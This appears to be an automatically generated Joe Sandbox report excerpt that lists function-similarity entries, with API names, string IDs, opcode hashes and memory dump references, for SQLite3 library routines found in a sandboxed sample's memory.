                                                                                        • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                        • API String ID: 1646373207-2713375476
                                                                                        • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                        • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 2313487548-0
                                                                                        • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                        • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                        • API String ID: 0-1177837799
                                                                                        • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                        • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1648232842-0
                                                                                        • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                        • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                        APIs
                                                                                        • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                        • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 3429445273-0
                                                                                        • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                        • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1035992805-0
                                                                                        • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                        • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                        • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                        • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                        • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                        • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                        • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                        • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 2673540737-0
                                                                                        • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                        • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                        • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                        • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                        • String ID:
                                                                                        • API String ID: 3526213481-0
                                                                                        • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                        • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                        • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                        • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                        APIs
                                                                                        • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                        • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                          • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                          • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                        • sqlite3_step.SQLITE3 ref: 60969197
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2877408194-0
                                                                                        • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                        • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                        • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                        • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID:
                                                                                        • API String ID: 1163609955-0
                                                                                        • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                        • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                        • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                        • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                        APIs
                                                                                        • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                        • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                        • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                          • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                        • String ID:
                                                                                        • API String ID: 4265739436-0
                                                                                        • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                        • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                        • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                        • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                                        • strcmp.MSVCRT ref: 6092A66A
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1894734062-0
                                                                                        • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                        • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                                        • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                        • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                        • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                        • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                        • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: into$out of
                                                                                        • API String ID: 632333372-1114767565
                                                                                        • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                        • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                        APIs
                                                                                          • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                        • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_value_text
                                                                                        • String ID: (NULL)$NULL
                                                                                        • API String ID: 2175239460-873412390
                                                                                        • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                        • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: string or blob too big$|
                                                                                        • API String ID: 632333372-330586046
                                                                                        • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                        • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
